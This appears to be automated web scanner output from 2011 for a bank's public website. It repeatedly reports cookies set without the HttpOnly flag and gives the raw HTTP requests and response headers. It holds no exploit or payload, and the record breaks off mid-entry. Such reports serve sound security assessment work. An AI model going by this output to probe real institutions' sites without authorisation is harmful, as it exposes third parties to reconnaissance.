The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mortgages/overview.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:25 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 22758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/faq.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 59861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/mobile-banking/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 212
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2> </bo ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-banking/olbdemo.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:28 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 17036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /open-account.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal-investing/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 22:18:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com/personal-investing/default.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/cds.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:03 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 33846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/college-saver.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:06 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 35701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/goaltrack-savings.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:11 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 44060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/homebuyer-savings.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:11 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 37376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings-and-cds/money-markets.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:09 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27434
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /security/equal-housing-lender.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 13931
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/standard-overdraft-practices.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:38 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:38:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:48:45 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 24618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-banking-online.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:38:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:48:45 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 20819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-checking-accounts.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:26:59 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 23745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-loans.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:00 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 24102
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spanish/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:50:07 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15918
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:28 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 21138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-loans/overview.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:50:13 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 20164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/SiteMap.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:40:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 174442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/leaving.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookies were issued by the application and do not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
HiddenPopup=popup=False; path=/
HiddenError=error=False; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tools/regionalgateway.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
